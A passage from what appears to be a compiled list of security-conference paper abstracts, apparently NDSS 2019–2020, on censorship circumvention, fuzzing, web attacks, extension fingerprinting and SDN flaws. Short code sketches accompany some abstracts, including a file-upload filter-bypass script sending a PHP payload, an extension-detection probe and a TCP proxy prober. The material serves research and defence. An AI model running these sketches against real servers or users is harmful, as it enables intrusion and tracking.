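edges = {"a": ["b"], "b": ["a", "c"], "c": ["b", "d"], "d": ["c"]}
weights = {(n, m): 1.0 for n, ms in edges.items() for m in ms}
print(propagate(nodes, edges, weights, {"a": 1.0, "d": -1.0}))
```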

Enemy At the Gateways: Censorship-Resilient Proxy Distribution Using Game Theory

A core technique used by popular proxy-based circumvention systems like Tor is to privately and selectively distribute the IP addresses of circumvention proxies among censored clients to keep them unknown to the censors.

In Tor, for instance, such privately shared proxies are known as bridges. A key challenge to this mechanism is the insider attack problem: censoring agents can impersonate benign censored clients in order to learn (and then block) the privately shared circumvention proxies. To mitigate this insider attack threat, in-the-wild circumvention systems like Tor use various proxy assignment mechanisms that aim to minimize the risk of proxy enumeration by the censors, while providing access to a large fraction of censored clients.

Unfortunately, existing proxy assignment mechanisms (like the one used by Tor) are based on ad hoc heuristics that offer no theoretical guarantees and are easily evaded in practice. In this paper, we take a systematic approach to the problem of proxy distribution in circumvention systems by establishing a game-theoretic framework. We model the proxy assignment problem as a game between circumvention system operators and the censors, and use game theory to derive the optimal strategies of each of the parties. Using our framework, we derive the best (optimal) proxy assignment mechanism of a circumvention system like Tor in the presence of the strongest censorship adversary who takes her best censorship actions.

We perform extensive simulations to evaluate our optimal proxy assignment algorithm under various adversarial and network settings. We show that the algorithm has superior performance compared to the state of the art, i.e., provides stronger resistance to censorship even against the strongest censorship adversary. Our study establishes a generic framework for optimal proxy assignment that can be applied to various types of circumvention systems and under various threat models. We conclude with lessons and recommendations for the design of proxy-based circumvention systems.

Neuro-Symbolic Execution: Augmenting Symbolic Execution with Neural Constraints

Symbolic execution is a powerful technique for program analysis. However, it has many limitations in practical applicability: the path explosion problem that encumbers scalability, the need for language-specific implementations, the inability to handle complex dependencies, and the limited expressiveness of the theories supported by the underlying satisfiability checkers. Often, relationships between variables of interest are not expressible directly as purely symbolic constraints. To this end, we present a new approach—neuro-symbolic execution—which learns an approximation of the relationship between program values of interest, as a neural network. We develop a procedure for checking satisfiability of mixed constraints, involving both symbolic expressions and neural representations. We implement our new approach in a tool called NeuEx as an extension of KLEE, a state-of-the-art dynamic symbolic execution engine. NeuEx finds 33 exploits in a benchmark of 7 programs within 12 hours. This is an improvement in bug-finding efficacy of 94% over vanilla KLEE. We show that this new approach drives execution down difficult paths on which KLEE and other DSE extensions get stuck, eliminating limitations of purely SMT-based techniques.

Neural Machine Translation Inspired Binary Code Similarity Comparison beyond Function Pairs

Binary code analysis allows analyzing binary code without having access to the corresponding source code. It is widely used for vulnerability discovery, malware dissection, attack investigation, etc. A binary, after disassembly, is expressed in an assembly language. This inspires us to approach binary analysis by leveraging ideas and techniques from Natural Language Processing (NLP), a rich area focused on processing text of various natural languages. We notice that binary code analysis and NLP share a lot of analogical topics, such as semantics extraction, summarization, and classification. This work utilizes these ideas to address two important code similarity comparison problems. (I) Given a pair of basic blocks for different instruction set architectures, determining whether their semantics is similar or not; and (II) given a piece of code of interest, determining if it is contained in another piece of assembly code from a different architecture. The solutions to these two problems have many applications, such as cross-architecture code plagiarism detection, malware identification, and vulnerability discovery.

Despite the evident importance of Problem I, existing solutions are either inefficient or imprecise. Inspired by Neural Machine Translation (NMT), which is a new approach that tackles text across natural languages very well, we regard instructions as words and basic blocks as sentences, and propose a novel cross-(assembly)-lingual deep learning approach to solving the first problem, attaining high efficiency and precision. Regarding Problem II, many solutions have been proposed recently to solve this issue at the function level. However, performing cross-architecture code similarity comparison beyond function pairs is a new and more challenging endeavor. Employing our technique for cross-architecture basic-block comparison, we propose an effective solution to Problem II. We implement a prototype system and perform a comprehensive evaluation. A comparison between our approach and existing approaches to Problem I shows that our system outperforms them in terms of accuracy, efficiency and scalability. And the case studies utilizing the system demonstrate that our solution to Problem II is effective. Moreover, this research showcases how to apply ideas and techniques from NLP to large-scale binary code analysis.
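
A minimal sketch of the "instructions as words, basic blocks as sentences" framing: embed each normalized instruction, average the embeddings into a block vector, and compare blocks by cosine similarity. Real systems train these embeddings (e.g., with an NMT-style encoder); the random vectors here are placeholders.

```python
import numpy as np

rng = np.random.default_rng(0)
VOCAB = {}  # instruction token -> embedding vector

def embed_instruction(ins, dim=32):
    token = ins.split()[0]  # crude normalization: keep the mnemonic only
    if token not in VOCAB:
        VOCAB[token] = rng.normal(size=dim)
    return VOCAB[token]

def embed_block(block):
    return np.mean([embed_instruction(i) for i in block], axis=0)

def cosine(u, v):
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v)))

x86a = ["mov eax, 1", "add eax, ebx", "ret"]
x86b = ["mov ecx, 2", "add ecx, edx", "ret"]
print(cosine(embed_block(x86a), embed_block(x86b)))  # ~1.0: same mnemonics
```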

2020 Programme dblp

Session 1A: Web

FUSE: Finding File Upload Bugs via Penetration Testing ✔👍

An Unrestricted File Upload (UFU) vulnerability is a critical security threat that enables an adversary to upload her choice of a forged file to a target web server. This bug evolves into an Unrestricted Executable File Upload (UEFU) vulnerability when the adversary is able to conduct remote code execution of the uploaded file via triggering its URL. We design and implement FUSE, the first penetration testing tool designed to discover UFU and UEFU vulnerabilities in server-side PHP web applications. The goal of FUSE is to generate upload requests; each request becomes an exploit payload that triggers a UFU or UEFU vulnerability. However, this approach entails two technical challenges: (1) it should generate an upload request that bypasses all content-filtering checks present in a target web application; and (2) it should preserve the execution semantic of the resulting uploaded file. We address these technical challenges by mutating standard upload requests with carefully designed mutation operations that enable the bypassing of content-filtering checks and do not tamper with the execution of uploaded files. FUSE discovered 30 previously unreported UEFU vulnerabilities, including 15 CVEs from 33 real-world web applications, thereby demonstrating its efficacy in finding code execution bugs via file uploads.
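
A minimal sketch of the mutation idea: keep the payload executable and vary only the metadata that server-side filters inspect, such as the filename extension and Content-Type. The mutation list and upload endpoint below are illustrative; FUSE's mutation operators are far richer.

```python
import requests  # third-party: pip install requests

PHP_PAYLOAD = b"<?php echo 'pwned'; ?>"

MUTATIONS = [
    ("shell.php",     "application/x-php"),  # baseline
    ("shell.php",     "image/png"),          # lie in the Content-Type header
    ("shell.PhP",     "application/x-php"),  # case-mangled extension
    ("shell.php.png", "image/png"),          # double extension
    ("shell.phtml",   "application/x-php"),  # alternative PHP extension
]

def try_uploads(url):
    for filename, content_type in MUTATIONS:
        files = {"file": (filename, PHP_PAYLOAD, content_type)}
        r = requests.post(url, files=files, timeout=10)
        print(filename, content_type, "->", r.status_code)

# try_uploads("http://target.example/upload.php")  # hypothetical endpoint
```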

Melting Pot of Origins: Compromising the Intermediary Web Services that Rehost Websites

Intermediary web services such as web proxies, web translators, and web archives have become pervasive as a means to enhance the openness of the web. These services aim to remove the intrinsic obstacles to web access; i.e., access blocking, language barriers, and missing web pages. In this study, we refer to these services as web rehosting services and make the first exploration of their security flaws. The web rehosting services use a single domain name to rehost several websites that have distinct domain names; this characteristic makes web rehosting services intrinsically vulnerable to violating the same origin policy if not operated carefully. Based on the intrinsic vulnerability of web rehosting services, we demonstrate that an attacker can perform five different types of attacks that target users who make use of web rehosting services: persistent man-in-the-middle attack, abusing privileges to access various resources, stealing credentials, stealing browser history, and session hijacking/injection. Our extensive analysis of 21 popular web rehosting services, which have more than 200 million visits per day, revealed that these attacks are feasible. In response to this observation, we provide effective countermeasures against each type of attack.

Social media has become a primary means of content and information sharing, thanks to its speed and simplicity. In this scenario, link previews play the important role of giving users a meaningful first glance, summarizing the content of the shared webpage within its title, description, and image. In our work, we analyzed the preview-rendering process, observing how it can be misused to obtain benign-looking previews for malicious links. Concrete use cases for this line of research are phishing and spam distribution, in targeted attacks as well as large-scale campaigns.

We designed a set of experiments for 20 social media platforms, including social networks and instant messenger applications, and found that most platforms follow their own preview design and format, sometimes providing only partial information. Four of these platforms allow preview crafting so as to hide the malicious target even from a tech-savvy user, and we found that it is possible to create misleading previews for the remaining 16 platforms when an attacker can register their own domain. We also observe that 18 social media platforms employ neither active nor passive countermeasures against the spread of known malicious links or software, and that existing cross-checks on malicious URLs can be bypassed through client- and server-side redirections. To conclude, we suggest seven recommendations covering the spectrum of our findings, to improve the overall preview-rendering mechanism and increase users’ overall trust in social media platforms.

Cross-Origin State Inference (COSI) Attacks: Leaking Web Site States through XS-Leaks

In a Cross-Origin State Inference (COSI) attack, an attacker lures a victim into visiting an attack web page, which leverages the cross-origin interaction features of the victim’s web browser to infer the victim’s state at a target web site. Multiple instances of COSI attacks have been found in the past under different names such as login detection or access detection attacks. However, those attacks only consider two states (e.g., logged in or not) and focus on a specific browser leak method (or XS-Leak).

This work shows that mounting more complex COSI attacks, such as deanonymizing the owner of an account, determining if the victim owns sensitive content, and determining the victim’s account type, often requires considering more than two states. Furthermore, robust attacks require supporting a variety of browsers, since the victim’s browser cannot be predicted a priori. To address these issues, we present a novel approach to identify and build complex COSI attacks that differentiate more than two states and support multiple browsers by combining multiple attack vectors, possibly using different XS-Leaks. To enable our approach, we introduce the concept of a COSI attack class. We propose two novel techniques to generalize existing COSI attack instances into COSI attack classes and to discover new COSI attack classes. We systematically study existing attacks and apply our techniques to them, identifying 40 COSI attack classes. As part of this process, we discover a novel XS-Leak based on window.postMessage. We implement our approach into Basta-COSI, a tool to find COSI attacks in a target web site. We apply Basta-COSI to test four stand-alone web applications and 58 popular web sites, finding COSI attacks against each of them.

Carnus: Exploring the Privacy Threats of Browser Extension Fingerprinting

With users becoming increasingly privacy-aware and browser vendors incorporating anti-tracking mechanisms, browser fingerprinting has garnered significant attention. Accordingly, prior work has proposed techniques for identifying browser extensions and using them as part of a device’s fingerprint. While previous studies have demonstrated how extensions can be detected through their web accessible resources, there exists a significant gap regarding techniques that indirectly detect extensions through behavioral artifacts. In fact, no prior study has demonstrated that this can be done in an automated fashion. In this paper, we bridge this gap by presenting the first fully automated creation and detection of behavior-based extension fingerprints. We also introduce two novel fingerprinting techniques that monitor extensions’ communication patterns, namely outgoing HTTP requests and intra-browser message exchanges. These techniques comprise the core of Carnus, a modular system for the static and dynamic analysis of extensions, which we use to create the largest set of extension fingerprints to date. We leverage our dataset of 29,428 detectable extensions to conduct a comprehensive investigation of extension fingerprinting in realistic settings and demonstrate the practicality of our attack. Our experimental evaluation against a state-of-the-art countermeasure confirms the robustness of our techniques as 87.92% of our behavior-based fingerprints remain effective.

Subsequently, we aim to explore the true extent of the privacy threat that extension fingerprinting poses to users, and present a novel study on the feasibility of inference attacks that reveal private and sensitive user information based on the functionality and nature of their extensions. We first collect over 1.44 million public user reviews of our detectable extensions, which provide a unique macroscopic view of the browser extension ecosystem and enable a more precise evaluation of the discriminatory power of extensions as well as a new deanonymization vector. We also automatically categorize extensions based on the developers’ descriptions and identify those that can lead to the inference of personal data (religion, medical issues, etc.). Overall, our research sheds light on previously unexplored dimensions of the privacy threats of extension fingerprinting and highlights the need for more effective countermeasures that can prevent our attacks.
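
For reference, the web-accessible-resource (WAR) baseline that Carnus's behavioral fingerprints complement can be sketched in a few lines of in-page script. The extension ID and resource path below are placeholders; behavioral fingerprinting instead observes artifacts such as DOM modifications, outgoing HTTP requests, and intra-browser messages:

```ts
// Probe a known extension ID/resource pair by attempting to load its
// web-accessible resource; onload fires only if the extension is present.
type Probe = { id: string; path: string; name: string };

// Placeholder entry: a real probe list pairs extension IDs with resource
// paths declared under "web_accessible_resources" in their manifests.
const probes: Probe[] = [
  { id: "abcdefghijklmnopabcdefghijklmnop", path: "img/icon128.png", name: "example-extension" },
];

function probeOne(p: Probe): Promise<string | null> {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(p.name); // resource loaded -> installed
    img.onerror = () => resolve(null);  // load failed -> absent or hidden
    img.src = `chrome-extension://${p.id}/${p.path}`;
  });
}

Promise.all(probes.map(probeOne)).then((r) =>
  console.log("detected:", r.filter((x): x is string => x !== null))
);
```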

Session 1B: Fuzzing

HYPER-CUBE: High-Dimensional Hypervisor Fuzzing

Applying modern fuzzers to novel targets is often a very lucrative venture. Hypervisors are part of a very critical code base: compromising them could allow an attacker to compromise the whole cloud infrastructure of any cloud provider. In this paper, we build a novel fuzzer that aims explicitly at testing modern hypervisors. Our high-throughput fuzzer design for long-running interactive targets allows us to fuzz a large number of hypervisors, both open source and proprietary. In contrast to one-dimensional fuzzers such as AFL, HYPER-CUBE can interact with any number of interfaces in any order.

Our evaluation shows that we find more bugs (over 2x) and achieve more coverage (as much as 2x) than state-of-the-art hypervisor fuzzers. Additionally, in most cases, we were able to do so using multiple orders of magnitude less time than comparable fuzzers. HYPER-CUBE was also able to rediscover a set of well-known vulnerabilities for hypervisors, such as VENOM, in less than five minutes. In total, HYPER-CUBE found 54 novel bugs, for which we have so far obtained 37 CVEs. Our evaluation results demonstrate that next-generation coverage-guided fuzzers should incorporate a higher-throughput design for long-running targets such as hypervisors.

HFL: Hybrid Fuzzing on the Linux Kernel

Hybrid fuzzing, combining symbolic execution and fuzzing, is a promising approach for vulnerability discovery because each approach can complement the other. However, we observe that applying hybrid fuzzing to kernel testing is challenging because the following unique characteristics of the kernel make a naive adoption of hybrid fuzzing inefficient: 1) having many implicit control transfers determined by syscall arguments, 2) controlling and matching internal system state via system calls, and 3) inferring nested argument types for invoking system calls. Failure to handle these challenges renders both fuzzing and symbolic execution inefficient, and thereby results in inefficient hybrid fuzzing. Although these challenges are essential to both fuzzing and symbolic execution, to the best of our knowledge, existing kernel testing approaches either naively use each technique separately without handling them, or imprecisely handle only part of the challenges through static analysis.

To this end, this paper proposes HFL, which not only combines fuzzing with symbolic execution for hybrid fuzzing but also addresses kernel-specific fuzzing challenges via three distinct features: 1) converting implicit control transfers to explicit transfers, 2) inferring system call sequences to build a consistent system state, and 3) identifying nested argument types of system calls. As a result, HFL found 24 previously unknown vulnerabilities in recent Linux kernels. Additionally, HFL achieves 14% higher code coverage than Syzkaller and as much as eight times better coverage than S2E/TriforceAFL, using the same amount of resources (CPU, time, etc.). Regarding vulnerability discovery performance, HFL found 13 known vulnerabilities more than three times faster than Syzkaller.

HotFuzz: Discovering Algorithmic Denial-of-Service Vulnerabilities Through Guided Micro-Fuzzing

Fifteen billion devices run Java and many of them are connected to the Internet. As this ecosystem continues to grow, it remains an important task to discover the unknown security threats these devices face. Fuzz testing repeatedly runs software on random inputs in order to trigger unexpected program behaviors, such as crashes or timeouts, and has historically revealed serious security vulnerabilities. Contemporary fuzz testing techniques focus on identifying memory corruption vulnerabilities that allow adversaries to achieve remote code execution. Meanwhile, algorithmic complexity (AC) vulnerabilities, which are a common attack vector for denial-of-service attacks, remain an understudied threat.

In this paper, we present HotFuzz, a framework for automatically discovering AC vulnerabilities in Java libraries. HotFuzz uses micro-fuzzing, a genetic algorithm that evolves arbitrary Java objects in order to trigger the worst-case performance for a method under test. We define Small Recursive Instantiation (SRI) which provides seed inputs to micro-fuzzing represented as Java objects. After micro-fuzzing, HotFuzz synthesizes test cases that triggered AC vulnerabilities into Java programs and monitors their execution in order to reproduce vulnerabilities outside the analysis framework. HotFuzz outputs those programs that exhibit high CPU utilization as witnesses for AC vulnerabilities in a Java library.

We evaluate HotFuzz over the Java Runtime Environment (JRE), the 100 most popular Java libraries on Maven, and challenges contained in the DARPA Space and Time Analysis for Cyber-Security (STAC) program. We compare the effectiveness of seed inputs derived with SRI against empty values. In this evaluation, we verified known AC vulnerabilities, discovered previously unknown AC vulnerabilities that we responsibly reported to vendors, and received confirmation from both IBM and Oracle. Our results demonstrate that micro-fuzzing finds AC vulnerabilities in real-world software, and that micro-fuzzing with SRI-derived seed inputs complements micro-fuzzing with empty seed inputs.
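
The micro-fuzzing loop itself is easy to picture. The sketch below is a drastically simplified, single-method stand-in in TypeScript (HotFuzz actually evolves arbitrary Java objects with SRI-derived seeds inside an instrumented JVM); fitness is simply the measured running time, and the method under test is a made-up quadratic routine:

```ts
// Schematic micro-fuzzing: hill-climb on inputs, keeping whichever input
// makes the method under test run longest (the AC-vulnerability signal).
type Candidate = { input: string; millis: number };

function timeIt(f: (s: string) => void, input: string): number {
  const t0 = performance.now();
  f(input);
  return performance.now() - t0;
}

function mutate(s: string): string {
  // Insert a short run of a repeated character at a random offset.
  const i = Math.floor(Math.random() * (s.length + 1));
  const run = "a".repeat(1 + Math.floor(Math.random() * 8));
  return s.slice(0, i) + run + s.slice(i);
}

function microFuzz(f: (s: string) => void, seed: string, generations = 200): Candidate {
  let best: Candidate = { input: seed, millis: timeIt(f, seed) };
  for (let g = 0; g < generations; g++) {
    const child = mutate(best.input);
    const millis = timeIt(f, child);
    if (millis > best.millis) best = { input: child, millis }; // keep slower inputs
  }
  return best;
}

// Stand-in method under test with quadratic worst-case behavior.
const methodUnderTest = (s: string) => {
  let dup = 0;
  for (let i = 0; i < s.length; i++)
    for (let j = 0; j < s.length; j++)
      if (i !== j && s[i] === s[j]) dup++;
};

const worst = microFuzz(methodUnderTest, "seed");
console.log(`slowest input: ${worst.input.length} chars, ${worst.millis.toFixed(2)} ms`);
```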

Not All Coverage Measurements Are Equal: Fuzzing by Coverage Accounting for Input Prioritization

Coverage-based fuzzing has been actively studied and widely adopted for finding vulnerabilities in real-world software applications. With code coverage, such as statement coverage and transition coverage, as the guidance for input mutation, coverage-based fuzzing can generate inputs that cover more code and thus find more vulnerabilities without prerequisite information such as input format. Current coverage-based fuzzing tools treat covered code equally. All inputs that contribute to new statements or transitions are kept for future mutation, no matter what the statements or transitions are and how much they impact security. Although this design is reasonable from the perspective of software testing, which aims at full code coverage, it is inefficient for vulnerability discovery since 1) current techniques are still inadequate for reaching full coverage within a reasonable amount of time, and 2) we always want to discover vulnerabilities early so that they can be patched promptly. Even worse, due to this non-discriminative treatment of code coverage, current fuzzing tools suffer from recent anti-fuzzing techniques and become much less effective in finding real-world vulnerabilities.

To resolve the issue, we propose coverage accounting, an innovative approach that evaluates code coverage by its security impact. Based on the proposed metrics, we design a new scheme to prioritize fuzzing inputs and develop TortoiseFuzz, a greybox fuzzer for memory corruption vulnerabilities. We evaluated TortoiseFuzz on 30 real-world applications and compared it with 5 state-of-the-art greybox and hybrid fuzzers (AFL, AFLFast, FairFuzz, QSYM, and Angora). TortoiseFuzz outperformed all greybox fuzzers and most hybrid fuzzers, and achieved results comparable to the remaining hybrid fuzzers while consuming far fewer resources. Additionally, TortoiseFuzz found 18 new real-world vulnerabilities and has received 8 new CVEs so far. We will open-source TortoiseFuzz to foster future research.
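
The prioritization idea can be sketched in a few lines. Everything below is illustrative: the edge weights and queue policy are made up, whereas TortoiseFuzz's actual metrics are derived from memory-operation counts at function, loop, and basic-block granularity:

```ts
// Toy coverage accounting: weight newly covered edges by a security-impact
// score instead of treating every new edge equally, then pick the seed
// that accumulates the most weight as the next mutation candidate.
type Seed = { input: string; coveredEdges: Set<number> };

const edgeWeight = new Map<number, number>([
  [101, 5], // edge into a block with a memcpy-like write: high impact
  [102, 1], // plain arithmetic block: low impact
  [103, 5],
]);

function score(seed: Seed, globalCovered: Set<number>): number {
  let s = 0;
  for (const e of seed.coveredEdges)
    if (!globalCovered.has(e)) s += edgeWeight.get(e) ?? 1;
  return s;
}

const globalCovered = new Set<number>([102]); // edges seen so far
const queue: Seed[] = [
  { input: "AAAA", coveredEdges: new Set([101, 102]) },
  { input: "BBBB", coveredEdges: new Set([102]) },
];

queue.sort((a, b) => score(b, globalCovered) - score(a, globalCovered));
console.log("next seed to mutate:", queue[0].input); // "AAAA"
```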

Session 2A: Censorship

Detecting Probe-resistant Proxies

Censorship circumvention proxies have to resist active probing attempts, where censors connect to suspected servers and attempt to communicate using known proxy protocols. If the server responds in a way that reveals it is a proxy, the censor can block it with minimal collateral risk to other non-proxy services. Censors such as the Great Firewall of China have previously been observed using basic forms of this technique to find and block proxy servers as soon as they are used. In response, circumventors have created new “probe-resistant” proxy protocols, including obfs4, Shadowsocks, and Lampshade, that attempt to prevent censors from discovering them. These proxies require knowledge of a secret in order to use them, and the servers remain silent when probed by a censor that does not have the secret, in an attempt to make detection more difficult.

In this paper, we identify ways that censors can still distinguish such probe-resistant proxies from other innocuous hosts on the Internet, despite their design. We discover unique TCP behaviors of five probe-resistant protocols used in popular circumvention software that could allow censors to effectively confirm suspected proxies with minimal false positives. We evaluate and analyze our attacks on hundreds of thousands of servers collected from a 10 Gbps university ISP vantage point over several days as well as active scanning using ZMap. We find that our attacks are able to efficiently identify proxy servers with only a handful of probing connections, with negligible false positives. Using our datasets, we also suggest defenses to these attacks that make it harder for censors to distinguish proxies from other common servers, and we work with proxy developers to implement these changes in several popular circumvention tools.
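
The core measurement behind such attacks can be sketched as a small prober: connect, send bytes no legitimate client would send, and record whether the server responds, sends a FIN, resets, or stays silent until a timeout; which of these happens, and after how long, is exactly the kind of TCP behavior the paper shows to be distinguishable. A minimal Node/TypeScript sketch (the address is a placeholder; only probe hosts you are authorized to test):

```ts
import * as net from "node:net";

function probe(host: string, port: number): Promise<string> {
  return new Promise((resolve) => {
    const sock = net.connect({ host, port });
    const t0 = Date.now();
    const done = (msg: string) => { resolve(msg); sock.destroy(); };
    sock.setTimeout(30_000);
    sock.on("connect", () => sock.write(Buffer.from([0x00, 0x01, 0x02, 0x03])));
    sock.on("data", () => done("responded to garbage (ordinary service?)"));
    sock.on("end", () => done(`FIN after ${Date.now() - t0} ms`));
    sock.on("error", (e) => done(`error/RST: ${e.message}`));
    sock.on("timeout", () => done("silent 30 s timeout (proxy-like behavior)"));
  });
}

probe("203.0.113.10", 443).then(console.log); // placeholder address
```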

Decentralized Control: A Case Study of Russia

Until now, censorship research has largely focused on highly centralized networks that rely on government-run technical choke-points, such as the Great Firewall of China. Although it was previously thought to be prohibitively difficult, large-scale censorship in decentralized networks is on the rise. Our in-depth investigation of the mechanisms underlying decentralized information control in Russia shows that such large-scale censorship can be achieved in decentralized networks through inexpensive commodity equipment. This new form of information control presents a host of problems for censorship measurement, including difficulty identifying censored content, requiring measurements from diverse perspectives, and variegated censorship mechanisms that require significant effort to identify in a robust manner.

By working with activists on the ground in Russia, we obtained five leaked blocklists signed by Roskomnadzor, the Russian government's federal service for mass communications, along with seven years of historical blocklist data. This authoritative list contains domains, IPs, and subnets that ISPs have been required to block since November 1st, 2012. We used the blocklist from April 24, 2019, which contains 132,798 domains, 324,695 IPs, and 39 subnets, to collect active measurement data from residential, data center, and infrastructural vantage points. Our vantage points span 408 unique ASes that control ~65% of Russian IP address space.

Our findings suggest that data centers block differently from residential ISPs, both in quantity and in method of blocking, resulting in different experiences of the Internet from residential and data center network perspectives. As expected, residential vantage points experience high levels of censorship. While we observe a range of blocking techniques, such as TCP/IP blocking, DNS manipulation, and keyword-based filtering, we find that residential ISPs are more likely to inject blockpages with explicit notices to users when censorship is enforced. Russia's censorship architecture is a blueprint, and perhaps a forewarning, of how national censorship policies could be implemented in many other countries that have ISP ecosystems as diverse as Russia's. Understanding decentralized control will be key to continuing to preserve Internet freedom for years to come.

Measuring the Deployment of Network Censorship Filters at Global Scale

Content filtering technologies are often used for Internet censorship, but even as these technologies have become cheaper and easier to deploy, the censorship measurement community lacks a systematic approach to monitor their proliferation. Past research has focused on a handful of specific filtering technologies, each of which required cumbersome manual detective work to identify. Researchers and policymakers require a more comprehensive picture of the state and evolution of censorship based on content filtering in order to establish effective policies that protect Internet freedom.

In this work, we present FilterMap, a novel framework that can scalably monitor content filtering technologies based on their blockpages. FilterMap first compiles in-network and new remote censorship measurement techniques to gather blockpages from filter deployments. We then show how the observed blockpages can be clustered, generating signatures for longitudinal tracking. FilterMap outputs a map of regions of address space in which the same blockpages appear (corresponding to filter deployments), and each unique blockpage is manually verified to avoid false positives.

By collecting and analyzing more than 379 million measurements from 45,000 vantage points against more than 18,000 sensitive test domains, we are able to identify filter deployments associated with 90 vendors and actors and observe filtering in 103 countries. We detect the use of commercial filtering technologies for censorship in 36 out of 48 countries labeled as "Not Free" or "Partly Free" by the Freedom House "Freedom on the Net" report. The unrestricted transfer of content filtering technologies has led to highly available, low-cost, and highly effective filtering techniques that are easier to deploy and harder to circumvent. Identifying these filtering deployments highlights policy and corporate social responsibility issues, and adds accountability to filter manufacturers. Our continued publication of FilterMap data will help the international community track the scope, scale, and evolution of content-based censorship.
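
The clustering step can be pictured with a toy signature: strip page-specific text and attribute values, keep only the HTML tag skeleton, and hash it, so that responses sharing a skeleton likely come from the same filter product. FilterMap's actual clustering is more robust than this, but the sketch conveys the idea:

```ts
import { createHash } from "node:crypto";

// Reduce a blockpage to a template signature: tags only, attribute values
// blanked, then hashed. Pages from the same filter share a signature.
function blockpageSignature(html: string): string {
  const skeleton = (html.match(/<[a-zA-Z!/][^>]*>/g) ?? [])
    .map((tag) => tag.replace(/"[^"]*"/g, '""')) // drop attribute values
    .join("");
  return createHash("sha1").update(skeleton).digest("hex").slice(0, 12);
}

const pages = [
  "<html><body><h1>Access Denied</h1><p>Policy: gambling</p></body></html>",
  "<html><body><h1>Access Denied</h1><p>Policy: news</p></body></html>",
];
console.log(pages.map(blockpageSignature)); // identical -> one cluster
```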

SymTCP: Eluding Stateful Deep Packet Inspection with Automated Discrepancy Discovery

A key characteristic of commonly deployed deep packet inspection (DPI) systems is that they implement a simplified state machine of the network stack that often differs from that of the end hosts. The discrepancies between the two state machines have been exploited to bypass such DPI middleboxes. However, most prior approaches to do so rely on manually crafted adversarial packets, which is not only labor-intensive but may also not work well across a plurality of DPI-based middleboxes. Our goal in this work is to develop an automated way to craft such candidate packets, targeting TCP implementations in particular. Our approach to achieving this goal hinges on the key insight that while the TCP state machines of DPI implementations are obscure, those of the end hosts are well established. Thus, in our system SYMTCP, using symbolic execution, we systematically explore the TCP implementation of an end host, identifying candidate packets that can reach critical points in the code (e.g., those that cause packets to be accepted or dropped/ignored); such automatically identified packets are then fed through the DPI middlebox to determine if a discrepancy is induced and the middlebox can be bypassed. We find that our approach is extremely effective. It can generate tens of thousands of candidate adversarial packets in less than an hour. When evaluating against multiple state-of-the-art DPI middleboxes such as Zeek and Snort, as well as a state-level censorship firewall, the Great Firewall of China, we identify not only previously known evasion strategies but also novel ones that were never previously reported (e.g., involving the urgent pointer). The system can easily be extended to test other combinations of operating systems and DPI middleboxes, and can serve as a valuable tool for testing future DPIs' robustness against evasion attempts.

MassBrowser: Unblocking the Censored Web for the Masses, by the Masses

Existing censorship circumvention systems fail to offer reliable circumvention without sacrificing their users' QoS and privacy, or undertaking high costs of operation. We have designed and implemented a censorship circumvention system, called SwarmProxy (the anonymized submission name for MassBrowser), whose goal is to offer effective censorship circumvention to a large body of censored users, with high QoS, low costs of operation, and adjustable privacy protection. Towards this, we have made several key decisions in designing our system. First, we argue that circumvention systems should not bundle strong privacy protections (like anonymity) with censorship circumvention. Additional privacy properties should be offered as optional features to the users of circumvention systems, which can be enabled by specific users or on specific connections (perhaps by trading off QoS). Second, we combine various state-of-the-art circumvention techniques (such as using censored clients to proxy circumvention traffic for other censored clients, using volunteer NATed proxies, and leveraging CDN hosting) to make SwarmProxy significantly resistant to blocking, while keeping its cost of operation small ($0.001 per censored client per month).

We have built and deployed SwarmProxy as a fully operational system with end-user GUI software for major operating systems. Our system has been in beta release for over a year with hundreds of users from major censoring countries testing it on a daily basis. A key part of SwarmProxy’s design is using non-censored Internet users to run volunteer proxies to help censored users. We have performed the first user study on the willingness of typical Internet users in helping circumvention operators. We have used the findings of our user study in the design of SwarmProxy to encourage wide adoption by volunteers; particularly, our GUI software offers high transparency, control, and safety to the volunteers.

Session 4A: Future Networks

When Match Fields Do Not Need to Match: Buffered Packets Hijacking in SDN

Software-Defined Networking (SDN) greatly meets the need in industry for programmable, agile, and dynamic networks by deploying diversified SDN applications on a centralized controller. However, the SDN application ecosystem inevitably introduces new security threats, since compromised or malicious applications can significantly disrupt network operations. A number of effective security enhancement systems have been developed to defend against potential attacks from SDN applications, including data provenance systems to protect applications from being poisoned by malicious applications, rule conflict detection systems to prevent data packets from bypassing network security policies, and application isolation systems to prevent applications from corrupting controllers. In this paper, we identify a new design flaw in flow rule installation in SDN, and this vulnerability can be exploited by malicious applications to launch effective attacks that bypass existing defense systems. We discover that SDN systems do not check for inconsistency between the buffer ID and the match fields when an application attempts to install flow rules, so a malicious application can manipulate the buffer ID to hijack buffered packets even though the flow rule it installs does not match the packet with that buffer ID. We name this new vulnerability buffered packet hijacking; it can be exploited to launch attacks that disrupt all three SDN layers, namely the application layer, the data plane layer, and the control layer. First, by modifying buffered packets and resending them to controllers, a malicious application can poison other applications. Second, by manipulating the forwarding behavior of buffered packets, a malicious application can not only disrupt the TCP connections of flows but also make flows bypass network security policies. Third, by copying massive numbers of buffered packets to controllers, a malicious application can saturate the bandwidth of the SDN control channel and its computing resources. We demonstrate the feasibility and effectiveness of these attacks with both theoretical analysis and experiments in a real SDN testbed. Finally, we develop a lightweight defense system that can be readily deployed in existing SDN controllers as a patch.
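
The flaw is easiest to see in the shape of the flow-rule installation message itself. The sketch below uses a simplified, hypothetical FlowMod structure (not a real controller API; field names only loosely follow OpenFlow) to show the inconsistency the paper exploits: the switch applies the rule's actions to the buffered packet named by bufferId without ever checking that packet against the rule's match fields:

```ts
// Simplified, hypothetical flow-rule installation message.
interface FlowMod {
  match: { ipv4Dst?: string };        // what future packets must match
  actions: Array<{ output: string }>; // where matching packets go
  bufferId: number | null;            // null = no buffered packet attached
}

// A malicious app "hijacks" buffer 0x42, which holds some other flow's
// packet: the match fields are irrelevant to that packet, yet the switch
// still releases it to the attacker-chosen port.
const hijack: FlowMod = {
  match: { ipv4Dst: "10.0.0.99" },       // does NOT describe the buffered packet
  actions: [{ output: "attacker-port" }],
  bufferId: 0x42,                        // someone else's buffered packet
};

console.log("installing:", JSON.stringify(hijack));
// The defense amounts to: before applying `actions` to the buffered
// packet, verify that the packet actually satisfies `match`.
```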

Automated Discovery of Cross-Plane Event-Based Vulnerabilities in Software-Defined Networking

